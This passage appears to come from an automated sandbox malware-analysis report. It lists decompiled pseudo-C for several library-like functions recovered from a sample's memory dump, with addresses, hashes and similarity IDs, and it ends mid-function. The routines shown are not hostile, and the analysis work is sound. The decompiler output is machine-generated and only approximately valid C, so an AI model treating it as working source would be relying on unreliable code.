                                                    • Opcode Fuzzy Hash: acaa6e31e61caed4e801760308e2057d6d634b41a3c7b8ce5b2cc8df34cc8fde
                                                    • Instruction Fuzzy Hash: 9C516071E006099FDB15DFA8C890BAEBBF8FF89704F18402DE649EB251D671DA00CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017BB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E017BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x188f7a8);
				E0180D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0180D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E017FD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E017FF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0180DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E017FB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E017FB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E017FE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E017FA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                    0x017bb171
                                                    0x017bb171
                                                    0x017bb171
                                                    0x017bb171
                                                    0x017bb171
                                                    0x017bb176
                                                    0x017bb17b
                                                    0x017bb180
                                                    0x017bb186
                                                    0x017bb18f
                                                    0x017bb198
                                                    0x017bb1a4
                                                    0x017bb1aa
                                                    0x01814802
                                                    0x01814802
                                                    0x01814805
                                                    0x0181480c
                                                    0x0181480e
                                                    0x017bb1d1
                                                    0x017bb1d3
                                                    0x017bb1de
                                                    0x017bb1de
                                                    0x01814817
                                                    0x0181481e
                                                    0x01814820
                                                    0x01814822
                                                    0x01814822
                                                    0x01814824
                                                    0x01814824
                                                    0x0181482a
                                                    0x00000000
                                                    0x00000000
                                                    0x01814835
                                                    0x0181483a
                                                    0x0181483d
                                                    0x0181483f
                                                    0x01814842
                                                    0x01814842
                                                    0x01814842
                                                    0x01814846
                                                    0x0181484c
                                                    0x0181484e
                                                    0x01814851
                                                    0x01814851
                                                    0x01814853
                                                    0x01814854
                                                    0x01814854
                                                    0x01814858
                                                    0x0181485a
                                                    0x0181485a
                                                    0x0181485d
                                                    0x0181485f
                                                    0x01814861
                                                    0x01814861
                                                    0x01814866
                                                    0x0181486b
                                                    0x0181486e
                                                    0x01814871
                                                    0x01814876
                                                    0x01814876
                                                    0x01814878
                                                    0x0181487b
                                                    0x01814884
                                                    0x01814884
                                                    0x00000000
                                                    0x0181487d
                                                    0x0181487d
                                                    0x01814882
                                                    0x01814889
                                                    0x01814889
                                                    0x0181488f
                                                    0x01814891
                                                    0x018148e0
                                                    0x018148e2
                                                    0x018148e4
                                                    0x018148e4
                                                    0x018148e7
                                                    0x018148e7
                                                    0x018148ed
                                                    0x018148f4
                                                    0x018148f6
                                                    0x01814951
                                                    0x01814951
                                                    0x01814953
                                                    0x01814953
                                                    0x01814956
                                                    0x01814956
                                                    0x01814958
                                                    0x01814959
                                                    0x01814959
                                                    0x0181495d
                                                    0x0181495d
                                                    0x0181495f
                                                    0x0181495f
                                                    0x01814965
                                                    0x01814969
                                                    0x018149ba
                                                    0x018149ba
                                                    0x018149c1
                                                    0x018149c5
                                                    0x018149cc
                                                    0x018149d4
                                                    0x018149d7
                                                    0x018149da
                                                    0x018149e4
                                                    0x018149e5
                                                    0x018149f3
                                                    0x01814a02
                                                    0x00000000
                                                    0x01814a02
                                                    0x01814972
                                                    0x01814974
                                                    0x00000000
                                                    0x00000000
                                                    0x01814976
                                                    0x01814979
                                                    0x01814982
                                                    0x01814983
                                                    0x01814984
                                                    0x0181498b
                                                    0x0181498d
                                                    0x01814991
                                                    0x01814993
                                                    0x01814999
                                                    0x0181499d
                                                    0x018149a2
                                                    0x018149a2
                                                    0x018149a2
                                                    0x01814999
                                                    0x018149ac
                                                    0x00000000
                                                    0x018149b3
                                                    0x018148f8
                                                    0x018148fe
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x018148fe
                                                    0x01814895
                                                    0x0181489c
                                                    0x018148ad
                                                    0x018148b2
                                                    0x018148b5
                                                    0x018148b7
                                                    0x018148ba
                                                    0x018148bc
                                                    0x018148c6
                                                    0x018148c6
                                                    0x018148cb
                                                    0x018148d1
                                                    0x018148d4
                                                    0x018148d8
                                                    0x018148d8
                                                    0x00000000
                                                    0x018148d8
                                                    0x018148be
                                                    0x018148c0
                                                    0x00000000
                                                    0x00000000
                                                    0x018148c2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x018148c4
                                                    0x00000000
                                                    0x01814882
                                                    0x0181487b
                                                    0x01814904
                                                    0x01814906
                                                    0x00000000
                                                    0x00000000
                                                    0x01814908
                                                    0x0181490e
                                                    0x00000000
                                                    0x00000000
                                                    0x01814910
                                                    0x01814917
                                                    0x01814917
                                                    0x00000000
                                                    0x01814917
                                                    0x017bb1ba
                                                    0x018147f9
                                                    0x018147fc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x018147fc
                                                    0x017bb1c0
                                                    0x017bb1c0
                                                    0x017bb1c3
                                                    0x017bb1cb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: _vswprintf_s
                                                    • String ID:
                                                    • API String ID: 677850445-0
                                                    • Opcode ID: c966c1d14a744dc524dd89eaac2bf87f34e31d6d06f6d639c0d2d3cac09d4f70
                                                    • Instruction ID: 8ea44427aa7a2a9277c5bb6b1524a5582281d7a514bae0698f624133863f614a
                                                    • Opcode Fuzzy Hash: c966c1d14a744dc524dd89eaac2bf87f34e31d6d06f6d639c0d2d3cac09d4f70
                                                    • Instruction Fuzzy Hash: 1951E172D0025A8EEB31CF68C844BAEBBB5BF04714F1041ADDD59EB29AD7704A45CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017DB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E017DB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x18ad360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E017D7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01888CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E017F9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E017FB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E017FCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E017D7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01888F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E017FAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x18a8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x18a862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x18a8628; // 0x0
							_t116 =  *0x18a862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                    0x017db94c
                                                    0x017db956
                                                    0x017db95c
                                                    0x017db95e
                                                    0x017db964
                                                    0x017db969
                                                    0x017db96d
                                                    0x017db96d
                                                    0x017db970
                                                    0x017db974
                                                    0x017db97a
                                                    0x017dbadf
                                                    0x017dbadf
                                                    0x017dbae2
                                                    0x017dbae4
                                                    0x017dbae6
                                                    0x017dbaf0
                                                    0x01822cb8
                                                    0x017dbaf6
                                                    0x017dbaf6
                                                    0x017dbaf6
                                                    0x017dbafd
                                                    0x017dbb1f
                                                    0x017dbb1f
                                                    0x017dbaff
                                                    0x017dbb00
                                                    0x017dbb00
                                                    0x017dbb03
                                                    0x017dbb03
                                                    0x017dbacb
                                                    0x017dbacf
                                                    0x017dbad0
                                                    0x017dbad1
                                                    0x017dbadc
                                                    0x017dbadc
                                                    0x017db980
                                                    0x017db980
                                                    0x017db988
                                                    0x017db98b
                                                    0x017db98d
                                                    0x017db990
                                                    0x017db993
                                                    0x017db999
                                                    0x017db99b
                                                    0x017db9a1
                                                    0x017db9a5
                                                    0x017db9aa
                                                    0x017db9b0
                                                    0x017db9bb
                                                    0x017db9c0
                                                    0x017db9c3
                                                    0x017db9ca
                                                    0x017db9cc
                                                    0x017db9cf
                                                    0x017db9d3
                                                    0x017db9d7
                                                    0x017dba94
                                                    0x017dba94
                                                    0x017dba98
                                                    0x017dbaa3
                                                    0x01822ccb
                                                    0x017dbaa9
                                                    0x017dbaa9
                                                    0x017dbaa9
                                                    0x017dbab1
                                                    0x01822cd5
                                                    0x01822cdd
                                                    0x01822cdd
                                                    0x017dbabb
                                                    0x017dbabc
                                                    0x017dbac2
                                                    0x017dbac3
                                                    0x017dbac3
                                                    0x017dbac6
                                                    0x00000000
                                                    0x017db9dd
                                                    0x017db9dd
                                                    0x017db9e7
                                                    0x017db9e7
                                                    0x017db9ec
                                                    0x017db9ec
                                                    0x017db9f1
                                                    0x017db9f5
                                                    0x017db9fa
                                                    0x017dba00
                                                    0x017dba0c
                                                    0x017dba10
                                                    0x017dba10
                                                    0x017dba12
                                                    0x017dba18
                                                    0x00000000
                                                    0x00000000
                                                    0x017dbb26
                                                    0x017dbb26
                                                    0x017dba1e
                                                    0x017dba1e
                                                    0x017dba23
                                                    0x017dba25
                                                    0x017dba2c
                                                    0x017dba30
                                                    0x017dba35
                                                    0x017dba35
                                                    0x017dba41
                                                    0x017dba46
                                                    0x017dba4c
                                                    0x017dba50
                                                    0x017dba54
                                                    0x017dba6a
                                                    0x017dba6e
                                                    0x017dba70
                                                    0x017dba74
                                                    0x017dba78
                                                    0x017dba7a
                                                    0x017dba7c
                                                    0x017dba8e
                                                    0x017dba90
                                                    0x017dba92
                                                    0x017dbb14
                                                    0x017dbb14
                                                    0x017dbb16
                                                    0x017dbb16
                                                    0x00000000
                                                    0x017dba7c
                                                    0x017dbb0a
                                                    0x017dbb0d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017dbb0f

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017DB9A5
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID:
                                                    • API String ID: 885266447-0
                                                    • Opcode ID: bc2ac14b7aebd7f60e1b90211154aba2bfe120711bcae08dd9224966c0e3bf77
                                                    • Instruction ID: 01f8646fd4c2f0db89dd4ec15dfde0e3ee25f1731a176d7123bada41d52aa694
                                                    • Opcode Fuzzy Hash: bc2ac14b7aebd7f60e1b90211154aba2bfe120711bcae08dd9224966c0e3bf77
                                                    • Instruction Fuzzy Hash: 5A515771A08345CFD721CF69C08092BFBF5BB8A600F55496EF68587349D730E940CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E2581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E017E2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t239;
				signed int _t243;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				signed int _t256;
				signed int _t263;
				signed int _t266;
				signed int _t274;
				signed int _t280;
				signed int _t282;
				void* _t284;
				void* _t285;
				signed int _t286;
				unsigned int _t289;
				signed int _t293;
				char* _t294;
				signed int _t295;
				signed int _t299;
				intOrPtr _t311;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t327;
				signed int _t328;
				signed int _t330;
				void* _t331;
				signed int _t332;
				signed int _t334;
				signed int _t337;
				void* _t338;
				void* _t340;

				_t334 = _t337;
				_t338 = _t337 - 0x4c;
				_v8 =  *0x18ad360 ^ _t334;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t327 = 0x18ab2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t289 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t340 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t280 = 0x48;
				_t309 = 0 | _t340 == 0x00000000;
				_t320 = 0;
				_v37 = _t340 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t280 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t328 = 0xc0000106;
						goto L32;
					} else {
						_t327 = L017D4620(_t289,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t280);
						_v52 = _t327;
						__eflags = _t327;
						if(_t327 == 0) {
							_t328 = 0xc0000017;
							goto L32;
						} else {
							 *(_t327 + 0x44) =  *(_t327 + 0x44) & 0x00000000;
							_t50 = _t327 + 0x48; // 0x48
							_t322 = _t50;
							_t309 = _v32;
							 *(_t327 + 0x3c) = _t280;
							_t282 = 0;
							 *((short*)(_t327 + 0x30)) = _v48;
							__eflags = _t309;
							if(_t309 != 0) {
								 *(_t327 + 0x18) = _t322;
								__eflags = _t309 - 0x18a8478;
								 *_t327 = ((0 | _t309 == 0x018a8478) - 0x00000001 & 0xfffffffb) + 7;
								E017FF3E0(_t322,  *((intOrPtr*)(_t309 + 4)),  *_t309 & 0x0000ffff);
								_t309 = _v32;
								_t338 = _t338 + 0xc;
								_t282 = 1;
								__eflags = _a8;
								_t322 = _t322 + (( *_t309 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t274 = E018439F2(_t322);
									_t309 = _v32;
									_t322 = _t274;
								}
							}
							_t293 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t328 = _v68;
								__eflags = 0;
								 *((short*)(_t322 - 2)) = 0;
								goto L32;
							} else {
								_t280 = _t327 + _t282 * 4;
								_v56 = _t280;
								do {
									__eflags = _t309;
									if(_t309 != 0) {
										_t239 =  *(_v60 + _t293 * 4);
										__eflags = _t239;
										if(_t239 == 0) {
											goto L30;
										} else {
											__eflags = _t239 == 5;
											if(_t239 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t280 =  *(_v60 + _t293 * 4);
										 *(_t280 + 0x18) = _t322;
										_t243 =  *(_v60 + _t293 * 4);
										__eflags = _t243 - 8;
										if(__eflags > 0) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t243 * 4 +  &M017E2959))) {
												case 0:
													__ax =  *0x18a8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E017FF3E0(__edi,  *0x18a848c, __ax & 0x0000ffff);
														__eax =  *0x18a8488 & 0x0000ffff;
														goto L26;
													}
													goto L118;
												case 1:
													L45:
													E017FF3E0(_t322, _v80, _v64);
													_t269 = _v64;
													goto L26;
												case 2:
													 *0x18a8480 & 0x0000ffff = E017FF3E0(__edi,  *0x18a8484,  *0x18a8480 & 0x0000ffff);
													__eax =  *0x18a8480 & 0x0000ffff;
													__eax = ( *0x18a8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E017FF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L118;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E017FF3E0(_t322, _v76, _v36);
														_t269 = _v36;
													}
													L26:
													_t338 = _t338 + 0xc;
													_t322 = _t322 + (_t269 >> 1) * 2 + 2;
													__eflags = _t322;
													L27:
													_push(0x3b);
													_pop(_t271);
													 *((short*)(_t322 - 2)) = _t271;
													goto L28;
												case 6:
													__ebx =  *0x18a575c;
													__eflags = __ebx - 0x18a575c;
													if(__ebx != 0x18a575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E017FF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x18a575c;
														} while (__ebx != 0x18a575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x18a8478 & 0x0000ffff = E017FF3E0(__edi,  *0x18a847c,  *0x18a8478 & 0x0000ffff);
													__eax =  *0x18a8478 & 0x0000ffff;
													__eax = ( *0x18a8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E018439F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x18a6e58 & 0x0000ffff = E017FF3E0(__edi,  *0x18a6e5c,  *0x18a6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x18a6e58 & 0x0000ffff;
													__eax = ( *0x18a6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t293 = _v16;
													_t309 = _v32;
													L29:
													_t280 = _t280 + 4;
													__eflags = _t280;
													_v56 = _t280;
													goto L30;
											}
										}
									}
									goto L118;
									L30:
									_t293 = _t293 + 1;
									_v16 = _t293;
									__eflags = _t293 - _v48;
								} while (_t293 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t243 =  *(_v60 + _t320 * 4);
						if(_t243 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t243 * 4 +  &M017E2935))) {
							case 0:
								__ax =  *0x18a8488;
								__eflags = __ax;
								if(__eflags != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t309 =  &_v64;
								_v80 = E017E2E3E(0,  &_v64);
								_t280 = _t280 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x18a8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x18a8480;
									goto L90;
								}
								goto L14;
							case 3:
								__eax = E017CEEF0(0x18a79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L67();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E017CEB70(__ecx, 0x18a79a0);
									__eflags = __esi - 0xc0000100;
									if(__eflags == 0) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
